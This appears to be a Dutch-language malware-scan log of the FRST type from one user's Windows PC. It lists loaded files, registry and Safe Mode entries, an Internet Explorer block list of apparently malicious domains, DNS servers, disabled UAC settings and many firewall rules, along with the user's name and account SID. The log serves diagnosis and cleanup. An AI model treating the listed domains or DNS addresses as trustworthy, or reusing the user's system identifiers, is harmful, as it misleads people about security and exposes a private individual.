2016-01-30 12:36 - 2015-12-22 01:22 - 01826608 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtCore.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00083912 _____ () C:\Program Files (x86)\Dropbox\Client\sip.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 03891504 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWidgets.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 01950000 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtGui.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00519984 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtNetwork.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00133936 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKit.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00225080 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKitWidgets.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00207672 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtPrintSupport.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00024904 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_wpad_proxy_win_x752e3d61xdcfdcc84.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00486704 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQuick.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00357680 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQml.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00019920 _____ () C:\Program Files (x86)\Dropbox\Client\QtQuick.2\qtquick2plugin.dll
2016-01-30 12:36 - 2015-12-21 20:42 - 00786904 _____ () C:\Program Files (x86)\Dropbox\Client\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-01-30 12:36 - 2015-12-21 20:42 - 00063448 _____ () C:\Program Files (x86)\Dropbox\Client\QtQuick\Layouts\qquicklayoutsplugin.dll
2016-01-30 12:36 - 2015-12-21 20:42 - 00019408 _____ () C:\Program Files (x86)\Dropbox\Client\QtQuick\Window.2\windowplugin.dll
2016-01-30 12:36 - 2015-12-21 20:42 - 00063432 _____ () C:\Program Files (x86)\Dropbox\Client\libEGL.dll
2016-01-30 12:36 - 2015-12-21 20:42 - 01135568 _____ () C:\Program Files (x86)\Dropbox\Client\libGLESv2.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf
2014-12-11 22:58 - 2014-12-11 22:59 - 03758192 _____ () C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF

==================== Alternate Data Streams (gefilterd) =========

(Als een item is opgenomen in de fixlist, alleen de ADS wordt verwijderd.)

AlternateDataStreams: C:\Windows\System32:{DA6227CB-326B-4B4D-9A81-04B61F1538DD}
AlternateDataStreams: C:\Users\.DS_Store:AFP_AfpInfo
AlternateDataStreams: C:\ProgramData\Temp:5C321E34
AlternateDataStreams: C:\Users\Thomas\.DS_Store:AFP_AfpInfo

==================== Veilige Modus (gefilterd) ===================

(Als een item is opgenomen in de fixlist, wordt uit het register verwijderd. De "AlternateShell" waarde wordt hersteld.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== EXE Bestandskoppeling (gefilterd) ===============

(Als een item is opgenomen in de fixlist, het registry item zal worden teruggezet naar de standaardwaarden of verwijderd.)

==================== Internet Explorer vertrouwde/beperkte toegang ===============

(Als een item is opgenomen in de fixlist, wordt uit het register verwijderd.)

IE restricted site: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\008k.com -> 008k.com
IE restricted site: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\00hq.com -> 00hq.com
IE restricted site: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\0190-dialers.com -> 0190-dialers.com
IE restricted site: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\01i.info -> 01i.info
IE restricted site: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com
IE restricted site: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\0411dd.com -> 0411dd.com
IE restricted site: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\0511zfhl.com -> 0511zfhl.com
IE restricted site: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\05p.com -> 05p.com
IE restricted site: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\0632qyw.com -> 0632qyw.com
IE restricted site: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com
IE restricted site: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com
IE restricted site: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com
IE restricted site: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\0calories.net -> 0calories.net
IE restricted site: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\0cj.net -> 0cj.net
IE restricted site: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\0scan.com -> 0scan.com
IE restricted site: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com
IE restricted site: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\1-domains-registrations.com -> 1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\1-se.com -> 1-se.com
IE restricted site: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\1001movie.com -> 1001movie.com

Er zijn 6091 Meer websites.

==================== Hosts inhoud: ===============================

(Als nodig Hosts: opdracht kan worden opgenomen in de fixlist om Hosts te resetten.)

2009-07-14 03:34 - 2009-06-10 22:00 - 00000824 ____N C:\Windows\system32\Drivers\etc\hosts

==================== Andere gebieden ============================

(Momenteel is er geen automatische fix voor dit onderdeel.)

HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Thomas\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 82.163.142.3 - 95.211.158.130
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is ingeschakeld.

==================== MSCONFIG/TASK MANAGER Uitgeschakelde items ==

(Momenteel is er geen automatische fix voor dit onderdeel.)

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: Skype C2C Service => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: TeamViewer6 => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Assistent content manager voor PlayStation®.lnk => C:\Windows\pss\Assistent content manager voor PlayStation®.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk => C:\Windows\pss\Bluetooth.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Adobe Reader Speed Launcher => "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: BCSSync => "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
MSCONFIG\startupreg: Communicator => "C:\Program Files (x86)\Microsoft Office Communicator\communicator.exe" /fromrunkey
MSCONFIG\startupreg: Corel File Shell Monitor => C:\Program Files (x86)\Corel\Corel Paint Shop Pro Photo X2\CorelIOMonitor.exe
MSCONFIG\startupreg: Facebook Update => "C:\Users\Thomas\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver
MSCONFIG\startupreg: Google Update => "C:\Users\Thomas\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: HPCam_Menu => "c:\Program Files (x86)\Hewlett-Packard\Media\Webcam\MUITransfer\MUIStartMenu.exe" "c:\Program Files (x86)\Hewlett-Packard\Media\Webcam" UpdateWithCreateOnce "Software\Hewlett-Packard\Media\Webcam"
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: OfficeSyncProcess => "C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE"
MSCONFIG\startupreg: QlbCtrl.exe => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: SmartMenu => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe /background
MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\steam.exe" -silent
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: SynTPEnh => %ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe
MSCONFIG\startupreg: uTorrent => "C:\Users\Thomas\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED
MSCONFIG\startupreg: WirelessAssistant => C:\Program Files (x86)\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe

==================== Firewall regels (gefilterd) ===============

(Als een item is opgenomen in de fixlist, wordt uit het register verwijderd. Het bestand zal niet worden verplaatst tenzij apart vermeld.)

FirewallRules: [{F00D4002-E17D-4B1B-91FF-5A315720382F}] => (Allow) F:\fsetup.exe
FirewallRules: [{6C26C728-A1D8-46DE-9269-CB283BB5E12F}] => (Allow) F:\fsetup.exe
FirewallRules: [{3EBAE667-9F2F-4536-9B94-0697BE57E034}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{0EE9562A-BCD7-4641-A4FC-326A845BD1E3}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{144C6564-E404-4E4C-9EA7-50054CD6C34B}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{0A62C299-43B3-4FFB-821B-B123B94E76DF}] => (Allow) svchost.exe
FirewallRules: [{D8F0AE94-485B-4B0C-9E59-6B0B51DE4DB5}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe
FirewallRules: [{D0479C0B-D4C2-4156-885B-BF7096541A1A}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{382DFE0E-C4D8-4F46-9AC9-8A9EB4140B36}G:\halo\halo.exe] => (Allow) G:\halo\halo.exe
FirewallRules: [UDP Query User{08C16232-0C8B-4942-A113-43C4D82217DF}G:\halo\halo.exe] => (Allow) G:\halo\halo.exe
FirewallRules: [{56C778F3-1DC5-4404-9626-423A0D416ECD}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{A86A717A-F2DB-465E-B402-91F2DAE6197B}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{968A7FC9-81AE-4034-8959-12329E12F8C5}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{04073867-D264-47A7-B072-1CD5E5F8AF25}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [TCP Query User{D5DBC37F-B8AB-42A3-8DE9-B45E0BC3EAE5}G:\cnc first decade\command & conquer red alert™ ii\ra2\game.exe] => (Allow) G:\cnc first decade\command & conquer red alert™ ii\ra2\game.exe
FirewallRules: [UDP Query User{C8D13C3B-5169-4786-9D62-81A339EEEF63}G:\cnc first decade\command & conquer red alert™ ii\ra2\game.exe] => (Allow) G:\cnc first decade\command & conquer red alert™ ii\ra2\game.exe
FirewallRules: [{489E01D9-C5D7-4CAA-848C-11521262AAEE}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{0C42F0E1-7FFE-4458-9021-7C51547470BE}C:\program files\internet explorer\iexplore.exe] => (Block) C:\program files\internet explorer\iexplore.exe
FirewallRules: [UDP Query User{B9DFAA09-BE34-4326-A6DA-1B5D0752906C}C:\program files\internet explorer\iexplore.exe] => (Block) C:\program files\internet explorer\iexplore.exe
FirewallRules: [{7F46BDE3-4A1E-494C-AC9D-E1D9EEAC98E0}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{F95DF410-3357-4159-AB93-89495D859CBC}G:\halo\halo.exe] => (Allow) G:\halo\halo.exe
FirewallRules: [UDP Query User{0EECF269-3D52-4E45-A723-3B5128EA764B}G:\halo\halo.exe] => (Allow) G:\halo\halo.exe
FirewallRules: [{22330033-C6B6-4856-8A2F-42B335C712C0}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{2E2749F1-6E77-4960-A39F-459484A668C8}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{6B2FCA87-EEF5-42E5-A144-F2E4DF39E582}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{84C1C985-B008-426D-824F-E9C8B582C552}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{C8AF21BD-2A75-4BF4-93A0-05161BD3E5E5}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{B7914EEC-3729-45E6-B581-24D5CEE131E4}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxm08.exe
FirewallRules: [{04A2FCBE-8A59-4A41-A350-24E6CB64B465}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposfx08.exe
FirewallRules: [{2CDDC6BC-DD65-4A88-8D42-794A5228F928}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{FD6C8B6D-0643-431D-AA34-9F9DE38636DF}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{AB26D5B8-A682-42A3-8085-B2C82BDD06CD}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcopy2.exe
FirewallRules: [{58E63EF6-D08C-4CBA-9201-1F4E1D425F32}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{9F7E1BDC-1A90-4EB0-A49F-ECCFB793492F}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpzwiz01.exe
FirewallRules: [{A67E1489-5F8F-4A90-9712-3C2CE97CECA8}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe
FirewallRules: [{473230AA-EEB1-4DAD-9D64-10D401F725B4}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqnrs08.exe
FirewallRules: [{FB809197-1D31-4AF5-8FA4-0199B86FCBB4}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{7DC422A0-CF96-4330-A865-0863A82E0ABB}] => (Allow) C:\Program Files (x86)\common files\hp\digital imaging\bin\hpqphotocrm.exe
FirewallRules: [{056128B8-8CE2-447C-ABD2-C88933EC7BE0}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqsudi.exe
FirewallRules: [{9AA390FF-8D5D-4CBD-8D70-2A8E2DD1041C}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqpsapp.exe
FirewallRules: [{C93C922C-C4DF-46EA-A95B-3710BC64F9E5}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxs08.exe
FirewallRules: [{F5CCA2EC-DB53-429E-ACA7-8620B22D8C06}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqfxt08.exe
FirewallRules: [{C622DDCC-B796-4660-8F52-53C9A2C081E0}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqpse.exe
FirewallRules: [{270589BD-F9AA-4035-A745-F982617B91FD}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{ADDCE7C9-36FB-4741-AE96-35352CE57051}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{16C169EF-ACEF-47DA-88B0-C07FFBA4B9EE}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{887A2414-8A95-4587-8CD5-DCAB8779AAF2}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{CA9FB48B-F86F-42D8-A364-4B7A9647B47F}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{1D093FF0-ED1D-40CE-A445-74B508A31071}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{E397277E-CEB3-4722-A2BD-D2BA8EAEE42F}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{AEEBA16F-D724-4AA8-985B-A0D9DAF19900}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{DAF940F8-2786-459B-8C4B-740B434F432C}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{BB5DBCFA-FA85-4258-8D6A-B324D9623C20}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{000A4630-953B-47F8-97E3-AFD4EFE0BC09}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{040020C5-2325-44AB-AF09-2B73E2909429}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{4E56A2AE-C5C8-4CDD-95EF-C9C408EC6E69}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{0100E9B8-2D9A-4683-855F-31DFCF9D5253}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{F1AADA27-9397-4006-A25E-1760D66CB5E4}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{20B9D1CE-883E-4E9A-91AD-D34435015D4D}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{59126DC5-8E2D-43CC-A7AA-229F31BE45AD}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{AF6CDA1C-3A61-4871-A7C9-6D1AE439B2E1}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{C019BD90-EE72-45C9-B6A5-6DC752B753E2}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{935DD831-26ED-45F3-A755-A551EC7C2596}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{C53AFE3C-F133-4A3D-93B7-CA3B976CC966}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{561BCC31-E54C-44EA-8ED2-29318B583380}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{1FDD92CD-254B-45DB-8CDE-FE90704C9828}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{692FB8FC-27F2-407E-94FB-0F79430BDC43}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{6CCEF5B7-72D4-4993-97F1-BF09664D856A}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{75B3CFF3-0EF5-46C1-8FFD-27C842E9C100}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{C824CB98-998B-4CF0-8956-768C5D9B1649}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{A33DABA3-E973-4003-A762-D5CCA651E70F}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{FAC66634-2441-45E4-9EEC-E9122195ED92}G:\cnc first decade\command & conquer™ generals zero hour\generals.exe] => (Allow) G:\cnc first decade\command & conquer™ generals zero hour\generals.exe
FirewallRules: [UDP Query User{EA91CD60-8EB6-4DAA-806C-32094270339D}G:\cnc first decade\command & conquer™ generals zero hour\generals.exe] => (Allow) G:\cnc first decade\command & conquer™ generals zero hour\generals.exe
FirewallRules: [{07326169-FACF-4E36-BB91-029EA797DC97}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{0BB33894-020E-44DB-9721-56332B5DC296}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{3E28E94A-E8F6-4032-B917-EBF4D5041EB8}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{AD670F30-EA27-40FC-B129-AFE6C3B76271}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{75224D51-B351-4FEC-8042-F69368110517}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{BE667AE7-6B49-4CC6-AC67-BADE7B5A1F1C}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{C415F02A-015F-4912-9C6A-D3EDDA0C531D}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{2B3BD622-92A2-4639-A168-D19FB919114C}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{7E7526B5-CB06-43CF-AB9C-A34B65DBE09E}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{C63882FC-0E2F-4075-92AF-C5AEE083A58C}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{6C28B272-7BB0-4CB2-8CFE-AF98347B2CB7}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{92B5BD85-7136-486D-8AAC-75C56732A456}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{FBB9663E-9EBA-429F-AB73-7E5154C50E8B}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{FFFC8FB7-874E-4438-8AC6-044783317071}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{B9AEB669-16AF-4319-A493-42BA169B03B9}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{805AFF7A-4905-450A-B6FB-9CF2491500A1}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{7CEE2169-B9E3-4857-A453-A9A228ADD433}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{1087B0E5-1156-4FE2-88B9-C65ADA6DB9CC}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{BA644C1D-4D80-47AA-BAEE-8DE7800D5825}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{3028CFBA-CACD-4E33-A1DD-F89E5E1D51CD}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{762EEFAB-1EC5-4401-8F16-BB6BCC25DA96}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{50C7A7E5-1333-455C-A320-A76A2ED6A0FE}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{B5F44752-040B-482F-AF40-4C380A6A71DD}C:\program files (x86)\mozilla firefox\plugin-container.exe] => (Block) C:\program files (x86)\mozilla firefox\plugin-container.exe
FirewallRules: [UDP Query User{CA5DE524-0016-468C-B814-FECF9FE2C52C}C:\program files (x86)\mozilla firefox\plugin-container.exe] => (Block) C:\program files (x86)\mozilla firefox\plugin-container.exe
FirewallRules: [TCP Query User{998602DD-4781-49F9-AAE7-2DB5E087FD5D}C:\program files (x86)\borland\interbase\bin\ibserver.exe] => (Allow) C:\program files (x86)\borland\interbase\bin\ibserver.exe
FirewallRules: [UDP Query User{551CD93D-0A10-4080-A309-97AB02521FEA}C:\program files (x86)\borland\interbase\bin\ibserver.exe] => (Allow) C:\program files (x86)\borland\interbase\bin\ibserver.exe
FirewallRules: [{F8BE4C48-8B14-4CC2-BA4E-29FC0F7CEE7E}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{DB30D244-F120-4B29-AEB2-94F16C7013EE}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{0CB00C40-DB61-4351-BCC5-28E8EA284D30}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{0EB6CBE5-C1F5-4F16-985A-7126258F8D20}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{42419570-0934-4A50-B924-015D92592CBC}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{46F7EF7B-A20D-4FCA-B9C9-84785D2789BF}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [TCP Query User{7047842C-DE29-4CC8-8528-DC7D00A1040A}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [UDP Query User{E0919201-4AFD-42BF-904B-CC613F3392BB}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [TCP Query User{E62E86BA-79E4-4EE9-97D1-4B743F4AE3EF}C:\program files (x86)\videolan\vlc\vlc.exe] => (Block) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [UDP Query User{A0B71AC1-351D-4F49-8282-C6D7F1A70023}C:\program files (x86)\videolan\vlc\vlc.exe] => (Block) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [TCP Query User{336BD99A-3F51-49D1-A4A3-6AA9C89E37A9}C:\users\thomas\appdata\roaming\wuala\wuala.exe] => (Allow) C:\users\thomas\appdata\roaming\wuala\wuala.exe
FirewallRules: [UDP Query User{B5F6953E-90F5-438B-B15F-DE7D1D288592}C:\users\thomas\appdata\roaming\wuala\wuala.exe] => (Allow) C:\users\thomas\appdata\roaming\wuala\wuala.exe
FirewallRules: [{ED82A1B2-45A3-4C50-B7FC-ABFE158FD41A}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1544\Agent.exe
FirewallRules: [{97E1A6F9-2F8C-4732-9A51-157DA391E0E5}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1544\Agent.exe
FirewallRules: [{A05A2A6B-F8FC-4079-8F5E-A5BE9D8D7E48}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{0DD20D9E-B5FB-4D86-A7B4-79FF18693201}] => (Allow) LPort=2869
FirewallRules: [{6A5B76B6-FE2F-492D-9B9E-7ED6E4F76392}] => (Allow) LPort=1900
FirewallRules: [{D6EAE1FE-FE05-4CDE-A935-C5C2BEB57E6B}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1544\Agent.exe
FirewallRules: [{300F1A3C-C002-4D5D-B3F1-091EB3EB2B71}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1544\Agent.exe
FirewallRules: [TCP Query User{E4ADC380-E1FE-463C-B447-972A4899FE72}C:\program files (x86)\tibco\studio-community-3.5\studio\3.5\studio-rcp\eclipse\studioforanalyst.exe] => (Allow) C:\program files (x86)\tibco\studio-community-3.5\studio\3.5\studio-rcp\eclipse\studioforanalyst.exe
FirewallRules: [UDP Query User{B53A339E-99B7-4F27-BB95-DFBB3E79E854}C:\program files (x86)\tibco\studio-community-3.5\studio\3.5\studio-rcp\eclipse\studioforanalyst.exe] => (Allow) C:\program files (x86)\tibco\studio-community-3.5\studio\3.5\studio-rcp\eclipse\studioforanalyst.exe
FirewallRules: [TCP Query User{D2736581-04CE-46CF-BBF8-57B4B1E2217C}G:\cnc first decade\command & conquer red alert™ ii\ra2\game.exe] => (Allow) G:\cnc first decade\command & conquer red alert™ ii\ra2\game.exe
